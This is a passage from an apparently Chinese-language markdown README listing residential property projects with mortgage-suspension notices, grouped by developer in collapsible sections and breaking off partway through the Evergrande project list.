[ๆญๅทžไธญๅ—ๆ˜ฅๆบช้›†](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ๆต™ๆฑŸๆญๅทžไธญๅ—ๆ˜ฅๆบช้›†.png), [ๆ›ฒๆฑŸๆ–ฐ้ธฅ้น็ฌฌไธ‰ๅŸŽ๏ผˆๅพ…ๅœ่ดท๏ผ‰](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ๆญๅทžๅธ‚ๆ›ฒๆฑŸๆ–ฐ้ธฅ้น็ฌฌไธ‰ๅŸŽๅœ่ดท้ฃŽ้™ฉๅ‘Š็Ÿฅไนฆ.jpg), [ไธญๆถฆ็’ž็Ž‰ๅ…ฌ้ฆ†](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ไธญๆถฆ็’ž็Ž‰ๅ…ฌ้ฆ†.png) - **ๅ˜‰ๅ…ดๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆกไนก้‡‘็ง‘ๆ—ถไปฃๅคฉๆ‚ฆๅฐๅŒบ](images/ๆต™ๆฑŸ็œ/ๅ˜‰ๅ…ดๅธ‚/_้‡‘็ง‘ๆ—ถไปฃๅคฉๆ‚ฆๅฐๅŒบ) - **็ปๅ…ดๅธ‚๏ผˆ1๏ผ‰๏ผš** [็ปๅ…ด่—็‘ๅบœ](images/ๆต™ๆฑŸ็œ/็ปๅ…ดๅธ‚/_็ปๅ…ด่—็‘ๅบœ) ## ๅผ€ๅ‘ๅ•†ๆ€ป่ฎก 134๏ผˆๆŒ‰ๆ‹ผ้ŸณๆŽ’ๅบ๏ผ‰๏ผˆ็ปŸ่ฎกๆฅผ็›˜ๆ•ฐ 349๏ผ‰[ๆ•ฐๆฎๆบ](data/source/extra-info.json) <details> <summary><b> ๅฎ‰ๅพฝๆ–ฏ็‘žๆŠ•่ต„้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅฎ‰ๅพฝ็œ-ๅˆ่‚ฅๅธ‚-ๆ–ฏ็‘žๅคงๅŽฆ </details> <details> <summary><b> ๅฎ‰่”ๅœฐไบง้›†ๅ›ข ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๅฎ‰่”็”Ÿๆ€ๅŸŽๅ‡ฏๆ—‹ๅบœ </details> <details> <summary><b> ๅฅฅๅฑฑ้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅฅฅๅฑฑๆฑ‰ๅฃๆพŽๆนƒๅŸŽ,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅฅฅๅฑฑ็ปๅผ€ๆพŽๆนƒๅŸŽ๏ผˆ7ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅฅฅๅฑฑ้ฆ–ๅบœ </details> <details> <summary><b> ๅฅฅๅ›ญ้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅฅฅๅ›ญ่ช‰ๆน–ๆนพ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅฅฅๅ›ญๆ‚ฆๅŸŽ๏ผˆๆฑ‡ๆ™ฏๅ›ญ๏ผ‰ </details> <details> <summary><b> ็™พไธ–้‡‘่ฐทๅฎžไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-็›ˆๆ—ถยทๆœชๆฅๆธฏ </details> <details> <summary><b> ๅฎ่ƒฝ ใ€2ใ€‘</b></summary> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๅฎ่ƒฝๅŸŽไธ€ๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆต™ๆฑŸ็œ-็ปๅ…ดๅธ‚-็ปๅ…ด่—็‘ๅบœ </details> <details> <summary><b> ไฟๅฎš้“ญๅŸŸๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-ไฟๅฎšๅธ‚-ไธŠไธœๅพกๆ™ฏ </details> <details> <summary><b> ๅŒ—ๅคง่ต„ๆบ้›†ๅ›ขๆŽง่‚กๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๆฒณๅ—็œ-ๅผ€ๅฐๅธ‚-ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบๆœชๅๅบœไธ€ๆœŸ,<br> ๆฒณๅ—็œ-ๅผ€ๅฐๅธ‚-ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบ็ดซๅขƒๅบœไบŒๆœŸ,<br> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-ๅŒ—ๅคง่ต„ๆบ็ฟก็ฟ ๅ…ฌๅ›ญ </details> <details> <summary><b> ๅŒ—ไบฌๆ˜Š่ฟœ้š†ๅŸบๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅŒ—ไบฌๅธ‚-ๆˆฟๅฑฑๅŒบ-้•ฟๆตทๅพกๅข…ไธ‰ๆœŸ </details> <details> <summary><b> ๅŒ—ไบฌ้ธฟๅคไผŸไธšๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-้ธฟๅคๅ‡คๅ‡ฐๅŸŽไบ”ๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-้ธฟๅค็†ๆƒณๅŸŽ </details> <details> <summary><b> ๅธธ็†Ÿๅธ‚ๆ–ฐๆบๆˆฟๅœฐไบงๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ไธŠๆตทๅธ‚-ๅ˜‰ๅฎšๅŒบ-ๅ˜‰ๅฎšๅ—็ฟ”็ปฟ่ŒตๅŸŽๅธ‚ๅนฟๅœบ </details> <details> <summary><b> ้ƒดๅทžๅธ‚้ฒฒ้นๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-้ƒดๅทžๅธ‚-้ƒดๅทž้ฒฒ้นๅ•†่ดธๅŸŽ </details> <details> <summary><b> ้‡ๅบ†ๅพทๆฐๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๅพทๆฐ็Šถๅ…ƒๅบœ้‚ธ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ้‡ๅบ†ๅธ‚ๅคฉไป™ๆน–็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ไธ‡ๅทžๅŒบ-ๅคฉไป™ๆน–้ป„้‡‘ๆตทๅฒธ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ่พพๅŽฟๅŒ็››ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๅทดไธญๅธ‚-ๆฉ้˜ณๅทๆ—…ไธ–็บชๅค–ๆปฉ </details> <details> <summary><b> ๅคงๅˆ็ฝฎไธš ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๅ—ๅ……ๅธ‚-ๅ—ๅ……ๅคงๅˆๅŽๅบœ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅคง่ฟž็ปฟๆบๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ่พฝๅฎ็œ-ๅคง่ฟžๅธ‚-้ฆ™ๆตทๆปจๅŸŽไบŒๆœŸ </details> <details> <summary><b> ๅฝ“ไปฃ็ฝฎไธš๏ผˆไธญๅ›ฝ๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๅฝ“ไปฃๅ˜‰ๅฎๅ…ฌๅ›ญๆ‚ฆ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๅฝ“ไปฃๅขƒMOMA </details> <details> <summary><b> ้“ๅŽฟๅŽ็›ˆ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆฐธๅทžๅธ‚-้“ๅŽฟไธœๆ–นไธฝ้ƒฝไธ‰ๆœŸ๏ผˆๆฐธๅทž้“ๅŽฟ๏ผ‰ </details> <details> <summary><b> ๅพท้พ™ๆˆฟๅœฐไบง ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๆ‰ฟๅพทๅธ‚-็Šถๅ…ƒๅบœ </details> <details> <summary><b> ๅฏŒๅŠ› ใ€3ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-้ป”ๆฑŸๅŒบ-ๅฏŒๅŠ›้™ขๅฃซๅปถ็…ๅขƒ,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๅฏŒๅŠ›ๅ›ญๅบทๅ•†ไธšๅนฟๅœบ,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๅคชๅŽŸๅฏŒๅŠ›ๅคฉ็ฆงๅŸŽ3ๆœŸ </details> <details> <summary><b> ๅนฟ่ฅฟๆฑŸๅฎ‡ๆˆฟๅœฐไบงๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ๆฑŸๅฎ‡ไธ–็บชๅ…ฌ้ฆ† </details> <details> <summary><b> ๅนฟ่ฅฟ้นฟๅฏจ็ฅฅ็‘žๆ™Ÿ้‚ฆๆŠ•่ต„ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆŸณๅทžๅธ‚-้นฟๅฏจๅŽฟ้บ“ๆน–ๅ…ฌๅ›ญ้‡Œ </details> <details> <summary><b> ๅนฟ่ฅฟไธ‰็Žฏไผไธš้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-็Ž‰ๆž—ๅธ‚-ๅŒ—ๆตๅธ‚ไธ‰็Žฏๆ–ฐๅŸŽไบŒๆœŸ </details> <details> <summary><b> ๆก‚ๆž—ๅธ‚ๅˆๅ‡ฏๅฎžไธšๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-ๅฑฑๆฐดๅ›ฝ้™…,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-ๅฑฑๆฐดๅŽๅบญ </details> <details> <summary><b> ๆก‚ๆž—ๅธ‚็ตๅทๅŽฟไธ‡่ฑกๅ•†่ดธๅŸŽๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-็ตๅทๆฑ‡้‡‘ไธ‡่ฑกๆ–ฐๅŸŽ๏ผˆ11ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆตฉๅˆ›็ฝฎไธš้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆตฉๅˆ›ๆขงๆก่Œ—็ญ‘๏ผˆ7ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆ–ฐ้ƒ‘ๅธ‚ๆตฉๅˆ›ๅŸŽ </details> <details> <summary><b> ๅˆ่ƒฝๅœฐไบง ใ€3ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๅˆ่ƒฝๆžซไธนๅฎธๆ‚ฆ,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๅˆ่ƒฝๆน˜ๆฑŸๅ…ฌ้ฆ†,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰่ฟœๆด‹ๅˆ่ƒฝๆžซไธนๅ”ๆ‚ฆไบŒๆœŸ๏ผˆๅพ…ๅœ่ดท๏ผ‰ </details> <details> <summary><b> ๆฒณๅŒ—ๆฐธๅบทๆˆฟๅœฐไบงๅผ€ๅ‘้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-้‚ขๅฐๅธ‚-ๆฐธๅบทไธ‡ๅ›ฝๅŸŽ </details> <details> <summary><b> ๆฒณๅ—ๅฎ‰ๆ˜‡ๆˆฟๅœฐไบงๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆญฃๅ•†็Ž–ๅท้™ข </details> <details> <summary><b> ๆฒณๅ—ๅŽ็บณ็ฝฎไธš่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅŽ็บณ้พ™็†™ๆนพ </details> <details> <summary><b> ๆฒณๅ—ไน่ฃ•็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ไน่ฃ•้พ™ๅŸŽ </details> <details> <summary><b> ๆฒณๅ—็พŽๅ•†็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้พ™ๆน–ไธ€ๅท๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆฒณๅ—็œ็ฟฐ้ซ˜็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-ๅ‘จๅฃๅธ‚-ๆงๅบœๅ…ญๅทไธ‰ๆœŸ </details> <details> <summary><b> ๆฒณๅ—็œๆž—้‘ซๅฎžไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-่“ๅฎๆกƒๆบ้‡Œ </details> <details> <summary><b> ๆฒณๅ—็œๆธ…ๅŽๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆธ…ๅŽๅŸŽ๏ผˆ7ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆฒณๅ—็œๆณฐๅฑฑๅฒฉๅœŸๅฎžไธšๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆณฐๅฑฑ่ช‰ๆ™ฏๆœ—่ช‰ๅ›ญ </details> <details> <summary><b> ๆฒณๅ—็››ๆถฆ็ฝฎไธš้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็››ๆถฆๅŸŽๅฃนๅทๅ…ฌ้ฆ† </details> <details> <summary><b> ๆฒณๅ—ๆ–ฐ็”ฐๅŸŽ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้ƒ‘ๅทžๆ–ฐ็”ฐๅŸŽๆน–ๅ…‰้‡ŒไบŒๆœŸ(ๅŽŸๆดžๆž—ๆ–‡่‹‘) </details> <details> <summary><b> ๆฒณๅ—ๅ…ด่พพๆŠ•่ต„ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-ๅ—้˜ณๅธ‚-ๅ…ด่พพ็‘ๅบœ </details> <details> <summary><b> ๆฒณๅ—ๆ˜“้‘ซ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-ไฝณๅ’Œๆ–ฐๅŸŽ </details> <details> <summary><b> ๆฒณๅ—่ฑซๅ‘้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-่ฑซๅ‘็™ฝ้นญๆบๆ˜ฅๆ™“ไธ‰ๆœŸ </details> <details> <summary><b> ๆฒณๅ—็บต้‘ซ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็››ไธ–ๅง้พ™ๅŸŽไธ‰ๆœŸ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆ’ๅคง ใ€87ใ€‘</b></summary> ๅฎ‰ๅพฝ็œ-ๅˆ่‚ฅๅธ‚-ๆ’ๅคงไธญๅฟƒ๏ผˆ8ๆœˆ๏ผ‰,<br> ้‡ๅบ†ๅธ‚-ๅทดๅ—ๅŒบ-ๆ’ๅคงๆ–ฐๅŸŽๅ››ๆœŸ,<br> ้‡ๅบ†ๅธ‚-ๅคงๆธกๅฃๅŒบ-ๆ’ๅคง้บ“ๅฑฑๆน–๏ผˆ9ๆœˆ๏ผ‰,<br> ้‡ๅบ†ๅธ‚-้ป”ๆฑŸๅŒบ-ๆ’ๅคงๅ้ƒฝ๏ผˆ7ๆœˆ๏ผ‰,<br> ้‡ๅบ†ๅธ‚-ๆธๅŒ—ๅŒบ-ๆ’ๅคง่ฝจ้“ๆ—ถไปฃไบŒๆœŸ,<br> ็ฆๅปบ็œ-็ฆๅทžๅธ‚-ๆ’ๅคงๅคฉ็’ŸไบŒๆœŸ,<br> ๅนฟไธœ็œ-ๆญ้˜ณๅธ‚-ๆ’ๅคง็ฟก็ฟ ๅŽๅบญไบŒๆœŸ,<br> ๅนฟไธœ็œ-ๆฑ•ๅคดๅธ‚-ๆ’ๅคง้‡‘็ขงๅค–ๆปฉๆนพ๏ผˆๅ…ซๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅด‡ๅทฆๅธ‚-ๅนฟ่ฅฟๆ‰ถ็ปฅๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅบทๅ…ปๅŸŽ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-ๆก‚ๆž—ๆ’ๅคงๅŸŽ๏ผˆ10ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆŸณๅทžๅธ‚-ๆ’ๅคงๅŸŽไบŒๆœŸใ€ไธ‰ๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ๅ—ๅฎๆ’ๅคงๅŽๅบœไบŒๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-้’ฆๅทžๅธ‚-ๆ’ๅคงๅพกๆ™ฏๅŠๅฒ›ไบŒๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆขงๅทžๅธ‚-ๆ’ๅคง็ปฟๆดฒไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅŒ—็œ-้‚ฏ้ƒธๅธ‚-ๆ’ๅคง็ปฟๆดฒ,<br> ๆฒณๅŒ—็œ-้‚ฏ้ƒธๅธ‚-ๆ’ๅคงๆ‚ฆ็‘ๆนพ,<br> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๆ’ๅคงๆ‚ฆ้พ™ๅฐ,<br> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ๆ’ๆถฆไธญๅคฎๅนฟๅœบ,<br> ๆฒณๅŒ—็œ-้‚ขๅฐๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฒณๅŒ—็œ-ๅผ ๅฎถๅฃๅธ‚-ๅฎฃๅŒ–ๆ’ๅคงๆปจๆฒณๅทฆๅฒธ,<br> ๆฒณๅŒ—็œ-ๅผ ๅฎถๅฃๅธ‚-ๅฎฃๅŒ–ๆ’ๅคง็ฟก็ฟ ๆนพ,<br> ๆฒณๅ—็œ-ๅฎ‰้˜ณๅธ‚-ๆฒณๅ—ๅฎ‰้˜ณๆ’ๅคงๆœชๆฅๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-ๅฎ‰้˜ณๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฒณๅ—็œ-ๅผ€ๅฐๅธ‚-้ƒ‘ๅผ€ๆ’ๅคงๆœชๆฅๅŸŽไธ‰ๆœŸ,<br> ๆฒณๅ—็œ-ๆด›้˜ณๅธ‚-ๆ’ๅคงไบ‘ๆน–ไธŠ้ƒก,<br> ๆฒณๅ—็œ-ๆผฏๆฒณๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฒณๅ—็œ-ๅ—้˜ณๅธ‚-ๆ’ๅคงๅพกๅบœ,<br> ๆฒณๅ—็œ-ๅ•†ไธ˜ๅธ‚-ๆ’ๅคงๅ้ƒฝไบŒๆœŸ,<br> ๆฒณๅ—็œ-ๆ–ฐไนกๅธ‚-ๅนณๅŽŸๆ–ฐๅŒบๆ’ๅคงไธ‰ๆœŸๅŠๅŸŽๆน–๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆ’ๅคงๅŸŽ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆ’ๅคงๅ…ป็”Ÿ่ฐท,<br> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆน–ๅŒ—็œ-้„‚ๅทžๅธ‚-ๆ’ๅคง็ซฅไธ–็•Œๅ››ๅทๅœฐ๏ผˆๅปŠๆกฅๆฐดไนก๏ผ‰๏ผˆ9ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-้„‚ๅทžๅธ‚-ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ,<br> ๆน–ๅŒ—็œ-้šๅทžๅธ‚-ๆ’ๅคงๆ‚ฆ้พ™ๅฐ๏ผˆ10ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆ’ๅคง็ง‘ๆŠ€ๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆ’ๅคง้พ™ๅŸŽๅ››ๆœŸ,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅŒ—็œ-ๅ’ธๅฎๅธ‚-ๆ’ๅคงๅ้ƒฝ,<br> ๆน–ๅŒ—็œ-่ฅ„้˜ณๅธ‚-ๆ’ๅคง็ฟก็ฟ ้พ™ๅบญไธ€ๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-ๆ€€ๅŒ–ๅธ‚-ๆ’ๅคงๅธๆ™ฏ,<br> ๆน–ๅ—็œ-ๆ€€ๅŒ–ๅธ‚-ๆ’ๅคงไธญๅคฎๅนฟๅœบ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-ๆต้˜ณๅธ‚-ๆ’ๅคงๅŽๅบœๅ››ๆœŸ,<br> ๆน–ๅ—็œ-้‚ต้˜ณๅธ‚-ๆ’ๅคงๅŽๅบœ๏ผˆ9ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-ๆน˜ๆฝญๅธ‚-ๆ’ๅคงไนฆ้ฆ™้—จ็ฌฌ15ใ€16ๆ ‹,<br> ๆน–ๅ—็œ-ๅฒณ้˜ณๅธ‚-ๆ’ๅคงๆœชๆฅๅŸŽไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๅคงๆปจๆฑŸๅทฆๅฒธ,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๅคงๅพกๆ™ฏๅคฉไธ‹ไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๅคงๆ‚ฆๆน–ๅ•†ไธšๅนฟๅœบ๏ผˆ12ๆœˆ๏ผ‰,<br> ๅ‰ๆž—็œ-ๅ…ฌไธปๅฒญๅธ‚-ๆ’ๅคง่Šฑๆบช่ฐทๆˆ–ๆฐดไธ–็•Œ,<br> ๆฑŸ่‹็œ-ๅฎฟ่ฟๅธ‚-ๆ’ๅคงๆ‚ฆๆพœๆนพ,<br> ๆฑŸ่‹็œ-ๆณฐๅทžๅธ‚-ๆ’ๅคงๅพกๆ™ฏๅŠๅฒ›,<br> ๆฑŸ่‹็œ-ๆ‰ฌๅทžๅธ‚-ๆ’ๅคง่ง‚ๆพœๅบœ,<br> ๆฑŸ่‹็œ-้•‡ๆฑŸๅธ‚-ๆ’ๅคง็ซฅไธ–็•Œ,<br> ๆฑŸ่ฅฟ็œ-่ตฃๅทžๅธ‚-ไบŽ้ƒฝๅŽฟๆ’ๅคงๅพกๆ™ฏๅŒ—ๅŒบ,<br> ๆฑŸ่ฅฟ็œ-ๆ™ฏๅพท้•‡ๅธ‚-ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ,<br> ๆฑŸ่ฅฟ็œ-ๆ™ฏๅพท้•‡ๅธ‚-ๆ’ๅคง็‘ๅบญ,<br> ๆฑŸ่ฅฟ็œ-ๆ™ฏๅพท้•‡ๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ๆ’ๅคง็บๅบญ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ๆ’ๅคงๆž—ๆบชๅบœ๏ผˆ10ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-่ไนกๅธ‚-ๆ’ๅคงๅพกๅบœไบŒๆœŸ,<br> ๆฑŸ่ฅฟ็œ-ๆ–ฐไฝ™ๅธ‚-ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ๏ผˆ9ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-ๅฎœๆ˜ฅๅธ‚-ๆ’ๅคง็ปฟๆดฒๅ››ๆœŸ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคง็››ไบฌ็บๅบญ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคง่ฅฟๆฑŸๅคฉๆ‚ฆ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคงไธญๅคฎๅนฟๅœบ,<br> ๅฎๅคๅ›žๆ—่‡ชๆฒปๅŒบ-้“ถๅทๅธ‚-ๆ’ๅคง็บ็ฟๅบœ,<br> ๅฑฑไธœ็œ-ๆท„ๅšๅธ‚-ๆ’ๅคงๅ…ป็”Ÿ่ฐท,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคงๆปจๆฒณๅบœไบŒๆœŸ,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ๅ…ซๆœŸ๏ผˆ10ๆœˆ๏ผ‰,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ไบ”ๆœŸ๏ผˆๅ…ซๆœˆ๏ผ‰,<br> 